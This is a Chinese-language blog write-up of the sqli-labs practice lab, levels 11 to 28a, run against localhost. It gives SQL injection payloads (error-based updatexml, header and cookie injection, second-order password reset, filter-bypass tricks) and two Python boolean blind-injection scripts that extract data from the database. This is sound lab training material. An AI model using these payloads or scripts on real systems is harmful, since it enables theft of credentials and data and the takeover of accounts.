<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Less-11就是一个post注入测出闭合方式为单引号，没有过滤 Less-12测出闭合方式为”)，没有任何过滤 Less-13测出闭合方式之后无回显优先尝试报错注入updatexml，依旧没有过滤 Less-14闭合方式变了，报错注入依然可以 Less-15一开始测闭合没测出来，因为不管我用什么都没发现报错，索性就是直接sqlmap去试一下 1sqlmap.py -u http:&#x2F;&#x2F;127.0.">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs-master">
<meta property="og:url" content="https://rufeii.github.io/2025/12/22/sqli-labs-master/index.html">
<meta property="og:site_name" content="Rufeii">
<meta property="og:description" content="Less-11就是一个post注入测出闭合方式为单引号，没有过滤 Less-12测出闭合方式为”)，没有任何过滤 Less-13测出闭合方式之后无回显优先尝试报错注入updatexml，依旧没有过滤 Less-14闭合方式变了，报错注入依然可以 Less-15一开始测闭合没测出来，因为不管我用什么都没发现报错，索性就是直接sqlmap去试一下 1sqlmap.py -u http:&#x2F;&#x2F;127.0.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/12/image-20251222220207921.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/12/image-20251223211536324.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/12/image-20251226171429344.png">
<meta property="article:published_time" content="2025-12-22T13:53:04.000Z">
<meta property="article:modified_time" content="2025-12-26T15:28:13.445Z">
<meta property="article:author" content="Rufeii">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rufeii.github.io/images/achieve/2025/12/image-20251222220207921.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/website.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/website.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/website.jpg">
        
      
    
    <!-- title -->
    <title>sqli-labs-master</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0me</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/categories/">categ0ries</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/12/20/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9CBrute4Road/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/12/22/sqli-labs-master/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&text=sqli-labs-master"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&title=sqli-labs-master"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&is_video=false&description=sqli-labs-master"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=sqli-labs-master&body=Check out this article: https://rufeii.github.io/2025/12/22/sqli-labs-master/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&title=sqli-labs-master"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&title=sqli-labs-master"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&title=sqli-labs-master"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&title=sqli-labs-master"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2025/12/22/sqli-labs-master/&name=sqli-labs-master&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2025/12/22/sqli-labs-master/&t=sqli-labs-master"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-11"><span class="toc-number">1.</span> <span class="toc-text">Less-11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-12"><span class="toc-number">2.</span> <span class="toc-text">Less-12</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-13"><span class="toc-number">3.</span> <span class="toc-text">Less-13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-14"><span class="toc-number">4.</span> <span class="toc-text">Less-14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-15"><span class="toc-number">5.</span> <span class="toc-text">Less-15</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-16"><span class="toc-number">6.</span> <span class="toc-text">Less-16</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-17-update%E6%B3%A8%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">Less-17(update注入)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-18"><span class="toc-number">8.</span> <span class="toc-text">Less-18</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-19"><span class="toc-number">9.</span> <span class="toc-text">Less-19</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-20"><span class="toc-number">10.</span> <span class="toc-text">Less-20</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-21"><span class="toc-number">11.</span> <span class="toc-text">Less-21</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-22"><span class="toc-number">12.</span> <span class="toc-text">Less-22</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-23"><span class="toc-number">13.</span> <span class="toc-text">Less-23</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-24"><span class="toc-number">14.</span> <span class="toc-text">Less-24</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-25"><span class="toc-number">15.</span> <span class="toc-text">Less-25</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-25a"><span class="toc-number">16.</span> <span class="toc-text">Less-25a</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-26-%E6%97%A0%E7%A9%BA%E6%A0%BC%E5%92%8C%E6%B3%A8%E9%87%8A%E7%AC%A6"><span class="toc-number">17.</span> <span class="toc-text">Less-26(无空格和注释符)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-26a"><span class="toc-number">18.</span> <span class="toc-text">Less-26a</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-27"><span class="toc-number">19.</span> <span class="toc-text">Less-27</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-27a"><span class="toc-number">20.</span> <span class="toc-text">Less-27a</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-28"><span class="toc-number">21.</span> <span class="toc-text">Less-28</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-28a"><span class="toc-number">22.</span> <span class="toc-text">Less-28a</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        sqli-labs-master
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Rufeii</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-12-22T13:53:04.000Z" class="dt-published" itemprop="datePublished">2025-12-22</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/sql%E6%B3%A8%E5%85%A5/">sql注入</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h2><p>就是一个post注入测出闭合方式为单引号，没有过滤</p>
<h2 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h2><p>测出闭合方式为”)，没有任何过滤</p>
<h2 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h2><p>测出闭合方式之后无回显优先尝试报错注入updatexml，依旧没有过滤</p>
<h2 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h2><p>闭合方式变了，报错注入依然可以</p>
<h2 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h2><p>一开始测闭合没测出来，因为不管我用什么都没发现报错，索性就是直接sqlmap去试一下</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-15/ --forms</span><br></pre></td></tr></table></figure>

<p>sqlmap确实跑出来了，闭合方式是单引号，但是没有语法报错的回显</p>
<p><img src="/../images/achieve/2025/12/image-20251222220207921.png" alt="image-20251222220207921"></p>
<p>这就意味着它对语法错误的一个隐藏，这是你就是不能单独的去fuzz它的单引号了，利用布尔盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1/sqli-labs-master/Less-15/&quot;</span></span><br><span class="line">success_mark = <span class="string">&quot;flag.jpg&quot;</span>  <span class="comment"># 登录成功时页面包含的关键词</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">inject</span>():</span><br><span class="line">    result = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">10</span>):</span><br><span class="line">        low = <span class="number">32</span></span><br><span class="line">        high = <span class="number">126</span></span><br><span class="line">        mid = (low + high) // <span class="number">2</span></span><br><span class="line">        <span class="keyword">while</span> low &lt;= high:</span><br><span class="line">            payload = <span class="string">f&quot;admin&#x27; and ascii(substr((select database()),<span class="subst">&#123;i&#125;</span>,1))&gt;<span class="subst">&#123;mid&#125;</span>#&quot;</span></span><br><span class="line">            data = &#123;</span><br><span class="line">                <span class="string">&quot;uname&quot;</span>: payload,</span><br><span class="line">                <span class="string">&quot;passwd&quot;</span>: <span class="string">&quot;1&quot;</span>,</span><br><span class="line">                <span class="string">&quot;submit&quot;</span>: <span class="string">&quot;Submit&quot;</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                response = requests.post(url, data=data)</span><br><span class="line">                <span class="keyword">if</span> success_mark <span class="keyword">in</span> response.text:</span><br><span class="line">                    low = mid + <span class="number">1</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    high = mid - <span class="number">1</span></span><br><span class="line">            <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;Error: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">            mid = (low + high) // <span class="number">2</span></span><br><span class="line">        <span class="keyword">if</span> low &lt;= <span class="number">32</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        result += <span class="built_in">chr</span>(low)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;[+] 正在猜解第 <span class="subst">&#123;i&#125;</span> 位: <span class="subst">&#123;result&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;\n[!] 最终结果: <span class="subst">&#123;result&#125;</span>&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    inject()</span><br></pre></td></tr></table></figure>

<h2 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h2><p>闭合方式变成了”)，依旧是无回显，报错注入不行，那么就是布尔盲注</p>
<h2 id="Less-17-update注入"><a href="#Less-17-update注入" class="headerlink" title="Less-17(update注入)"></a>Less-17(update注入)</h2><p>开始在uname测试啥也没测出来，然后就看源码去了！这里就是我小丑了，更新密码这玩意就应该想到update，看了源码uname有过滤，先不考虑</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">$</span>update=&quot;UPDATE users SET password = &#x27;<span class="built_in">$</span>passwd&#x27; WHERE username=&#x27;<span class="built_in">$</span>row1&#x27;&quot;;</span><br></pre></td></tr></table></figure>

<p>这里的passwd没有过滤直接打</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">passwd=1111&#x27; and updatexml(2,concat(0x7e,(select password from users)),0)<span class="params">#</span><span class="built_in">&amp;</span>submit=Submit<span class="built_in">&amp;</span>uname=admin</span><br><span class="line"></span><br><span class="line">You can&#x27;t specify target table &#x27;users&#x27; for update in FROM clause</span><br></pre></td></tr></table></figure>

<p>这里就是表冲突了，就是你update的表和你select查询的表重复了，用一下嵌套</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">passwd=1111&#x27; and updatexml(2,concat(0x7e,(select group<span class="built_in">_</span>concat(password) from (select password from users) as temp)),0)<span class="params">#</span><span class="built_in">&amp;</span>submit=Submit<span class="built_in">&amp;</span>uname=admin</span><br></pre></td></tr></table></figure>

<p><strong>关键是：黑盒想到update，还有就是嵌套去避免冲突</strong></p>
<h2 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h2><p>黑盒打不出，还是去看源码打的，在UA头可以注入，注意得先登录进去</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">User-Agent:11111&#x27; and updatexml(1,concat(0x7e,(select group<span class="built_in">_</span>concat(password) from users)),1), 123, &#x27;rufeii&#x27;)<span class="params">#</span></span><br></pre></td></tr></table></figure>

<p>然后在别人那学到</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and &#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<p>这个相当于就不用去考虑插入了几条数据</p>
<p>白盒打出来了，想想黑盒的思路（有点事后诸葛亮了）</p>
<p><img src="/../images/achieve/2025/12/image-20251223211536324.png" alt="image-20251223211536324"></p>
<p>没有任何操作就是来了ip，那么这里就是没有进行数据库查询之前就是获取了ip，然后试了一下没有xff注入。应该是要登录进去，不登录的话………</p>
<p>你不管是xff和UA头进行注入，它无非就是两种场景：1，限制访问 2，记录日志</p>
<p>这里的话就是考虑记录，那你记录的话一般是跟用户一起记录的对吧，所以肯定要先登录，登录之后测出注入点就是去猜后端语句了</p>
<h2 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h2><p>Referer注入</p>
<h2 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h2><p>cookie注入</p>
<h2 id="Less-21"><a href="#Less-21" class="headerlink" title="Less-21"></a>Less-21</h2><p>cookie变成了base64加密</p>
<h2 id="Less-22"><a href="#Less-22" class="headerlink" title="Less-22"></a>Less-22</h2><p>同 21 ，单引号换成双引号即可</p>
<h2 id="Less-23"><a href="#Less-23" class="headerlink" title="Less-23"></a>Less-23</h2><p>注释符没了，闭合就好</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select group<span class="built_in">_</span>concat(password) from users)),1) or &#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<h2 id="Less-24"><a href="#Less-24" class="headerlink" title="Less-24"></a>Less-24</h2><p>首先注册用户登录进去，有个修改密码的操作，符合二次注入的测试条件，但是注册用户那里限制了字长只能20个，这就不好办了，但是可以改其它用户的密码</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注册用户&#x27;or&#x27;1&#x27;=&#x27;1&#x27;<span class="params">#</span></span><br></pre></td></tr></table></figure>

<p>改密码就全部改了</p>
<p><img src="/../images/achieve/2025/12/image-20251226171429344.png" alt="image-20251226171429344"></p>
<h2 id="Less-25"><a href="#Less-25" class="headerlink" title="Less-25"></a>Less-25</h2><p>过滤or和and，其实不然其实是置空这两个玩意，所以直接双写绕过即可</p>
<h2 id="Less-25a"><a href="#Less-25a" class="headerlink" title="Less-25a"></a>Less-25a</h2><p>字符型注入，其它与上题差不多</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=0 union select 1,2,4<span class="comment">%23</span></span><br></pre></td></tr></table></figure>

<h2 id="Less-26-无空格和注释符"><a href="#Less-26-无空格和注释符" class="headerlink" title="Less-26(无空格和注释符)"></a>Less-26(无空格和注释符)</h2><p>题目不能用空格了，空格的替代品也没有了，那么能不能不用空格呢？那就用逻辑符||和&amp;&amp;，这里我采用报错注入，注释也不能用，那就闭合</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">表：1&#x27;||updatexml(1,concat(0x7e,(select(group<span class="built_in">_</span>concat(table<span class="built_in">_</span>name))from(infoorrmation<span class="built_in">_</span>schema.tables)where(table<span class="built_in">_</span>schema=database()))),1)||&#x27;1&#x27;=&#x27;1</span><br><span class="line"></span><br><span class="line">字段：?id=1&#x27;||updatexml(1,concat(0x7e,(select(group<span class="built_in">_</span>concat(column<span class="built_in">_</span>name))from(infoorrmation<span class="built_in">_</span>schema.columns)where(table<span class="built_in">_</span>schema=database()<span class="comment">%26%26table_name=&#x27;users&#x27;))),1)||&#x27;1&#x27;=&#x27;1</span></span><br></pre></td></tr></table></figure>

<h2 id="Less-26a"><a href="#Less-26a" class="headerlink" title="Less-26a"></a>Less-26a</h2><p>报错没有了，搞了半天，直接布尔盲注，一开始&amp;&amp;在脚本里没编码，最终逐步排错到，一般都是二分法</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://127.0.0.1/sqli-labs-master/Less-26a/&quot;</span><br><span class="line">result = &#x27;&#x27;</span><br><span class="line">i = 0</span><br><span class="line"></span><br><span class="line">while True:</span><br><span class="line">    i = i + 1</span><br><span class="line">    head = 32</span><br><span class="line">    tail = 126</span><br><span class="line"></span><br><span class="line">    while head &lt; tail:                          <span class="params">#</span>由于确定flag一定在可见字符的范围内，所以等左右指针重合时，那就是我们需要的字符了</span><br><span class="line">        mid = (head + tail) &gt;&gt; 1                <span class="params">#</span>等价于(head+tail)//2整数除法</span><br><span class="line">        payload = f&quot;?id=0&#x27;||if(ascii(substr((select(group<span class="built_in">_</span>concat(column<span class="built_in">_</span>name))from(infoorrmation<span class="built_in">_</span>schema.columns)where(table<span class="built_in">_</span>schema=database()<span class="comment">%26%26table_name=&#x27;users&#x27;)),&#123;i&#125;,1))&gt;&#123;mid&#125;,1,0)||&#x27;1&#x27;=&#x27;2&quot;</span></span><br><span class="line">        r = requests.get(url + payload)</span><br><span class="line">        if &quot;Your Password:999&quot; in r.text:</span><br><span class="line">            head = mid + 1</span><br><span class="line">        else:</span><br><span class="line">            tail = mid</span><br><span class="line"></span><br><span class="line">    if head != 32:                                    <span class="params">#</span>用于判断是否找完了flag</span><br><span class="line">        result += chr(head)</span><br><span class="line">    else:</span><br><span class="line">        break</span><br><span class="line">    print(result)</span><br><span class="line"><span class="params">#</span>二分法脚本</span><br></pre></td></tr></table></figure>

<h2 id="Less-27"><a href="#Less-27" class="headerlink" title="Less-27"></a>Less-27</h2><p>过滤的不全，注释没有了用%00截断</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=00000&#x27;<span class="comment">%0aUniOn%0aSeLect%0a1,2,(selECt%0agroup_concat(username,%27:%27,password)%0afrom%0ausers);%00</span></span><br></pre></td></tr></table></figure>

<h2 id="Less-27a"><a href="#Less-27a" class="headerlink" title="Less-27a"></a>Less-27a</h2><p>“闭合</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=999999&quot;<span class="comment">%0aUnioN%0aSelecT%0a1,2,(selECt%0agroup_concat(username,%27:%27,password)%0afrom%0ausers);%00</span></span><br></pre></td></tr></table></figure>

<h2 id="Less-28"><a href="#Less-28" class="headerlink" title="Less-28"></a>Less-28</h2><p>当你发现注入语句没什么问题的时候，可以考虑一下闭合方式的问题</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x27;(1&#x27;||&#x27;1&#x27;=&#x27;1)&#x27;如果闭合方式是&#x27;()&#x27;，你用1&#x27;||&#x27;1&#x27;=&#x27;1也是可以的</span><br><span class="line">?id=1&#x27;)<span class="comment">%0aorder%0aby%0a3;%00</span></span><br><span class="line">后面也是没什么难度</span><br></pre></td></tr></table></figure>

<h2 id="Less-28a"><a href="#Less-28a" class="headerlink" title="Less-28a"></a>Less-28a</h2><figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/[<span class="keyword">\/</span><span class="keyword">\*</span>]/&#x27;,&quot;&quot;, <span class="built_in">$</span>id);				//strip out /*</span><br><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/[--]/&#x27;,&quot;&quot;, <span class="built_in">$</span>id);				//Strip out --.</span><br><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/[<span class="params">#</span>]/&#x27;,&quot;&quot;, <span class="built_in">$</span>id);					//Strip out <span class="params">#</span>.</span><br><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/[ +]/&#x27;,&quot;&quot;, <span class="built_in">$</span>id);	    		//Strip out spaces.</span><br><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/select/m&#x27;,&quot;&quot;, <span class="built_in">$</span>id);	   		 	//Strip out spaces.</span><br><span class="line">//<span class="built_in">$</span>id= preg<span class="built_in">_</span>replace(&#x27;/[ +]/&#x27;,&quot;&quot;, <span class="built_in">$</span>id);	    		//Strip out spaces.</span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=000&#x27;)<span class="comment">%0auniounion selectn select%0a1,2,(select%0agroup_concat(password)%0afrom%0ausers);%00</span></span><br></pre></td></tr></table></figure>

<p><code>preg_replace(&#39;/select/m&#39;,&quot;&quot;, $id);</code>这玩意也可以双写过，置空就双写就完事了XD</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0me</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/categories/">categ0ries</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-11"><span class="toc-number">1.</span> <span class="toc-text">Less-11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-12"><span class="toc-number">2.</span> <span class="toc-text">Less-12</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-13"><span class="toc-number">3.</span> <span class="toc-text">Less-13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-14"><span class="toc-number">4.</span> <span class="toc-text">Less-14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-15"><span class="toc-number">5.</span> <span class="toc-text">Less-15</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-16"><span class="toc-number">6.</span> <span class="toc-text">Less-16</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-17-update%E6%B3%A8%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">Less-17(update注入)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-18"><span class="toc-number">8.</span> <span class="toc-text">Less-18</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-19"><span class="toc-number">9.</span> <span class="toc-text">Less-19</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-20"><span class="toc-number">10.</span> <span class="toc-text">Less-20</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-21"><span class="toc-number">11.</span> <span class="toc-text">Less-21</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-22"><span class="toc-number">12.</span> <span class="toc-text">Less-22</span></a></li><li class="toc-item toc-level-2"><a 